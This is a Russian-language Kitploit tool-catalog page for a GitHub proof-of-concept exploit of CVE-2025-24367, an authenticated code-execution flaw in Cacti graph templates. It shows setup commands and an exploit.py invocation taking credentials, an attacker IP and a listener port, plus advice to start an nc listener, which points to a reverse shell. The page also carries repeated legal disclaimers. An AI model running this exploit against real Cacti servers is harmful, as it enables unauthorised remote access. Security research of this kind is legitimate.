Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24367-Cacti-PoC — Proof of Concept for CVE-2025-24367 | Kitploit
Инструменты/GitHubGitHub/thecybergeek/cve-2025-24367-cacti-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubthecybergeek/cve-2025-24367-cacti-poc

CVE-2025-24367-Cacti-PoC

Proof of Concept for CVE-2025-24367

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
3748 месяцев назадПроверено Kitploit

CVE-2025-24367 - Cacti: выполнение произвольного кода через аутентифицированный шаблон графа

Использование и безопасность

Важно — прочтите это сначала:
Этот репозиторий и exploit.py предоставлены только для образовательных и исследовательских целей. Не используйте этот код против систем, сетей или сервисов, на которые у вас нет явного письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Используя этот код, вы соглашаетесь соблюдать применимые законы и правила вашего учреждения.


Требования

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Использование

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

Пример

Перед запуском скрипта убедитесь, что у вас запущен nc listener. Запускайте скрипт без прокси, если только не отлаживаете:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

ОЧЕНЬ ВАЖНЫЕ ПРЕДУПРЕЖДЕНИЯ

  • Не запускайте это против рабочих систем или любых систем, которые вам не принадлежат или на которые у вас нет явного разрешения на тестирование.
  • Всегда получайте письменное разрешение перед проведением тестирования безопасности.
  • Используйте изолированные лабораторные среды (например, виртуальные машины, контейнеры или специально созданные тестовые сети) для экспериментов.
  • В вашей организации могут быть политики отчетности и раскрытия информации — соблюдайте их.
  • Авторы не несут ответственности за неправильное использование этого кода.

Последнее напоминание: Этот скрипт и README предназначены только для образовательных целей. Никогда не используйте эти инструменты для незаконного доступа к системам.

Скачать инструмент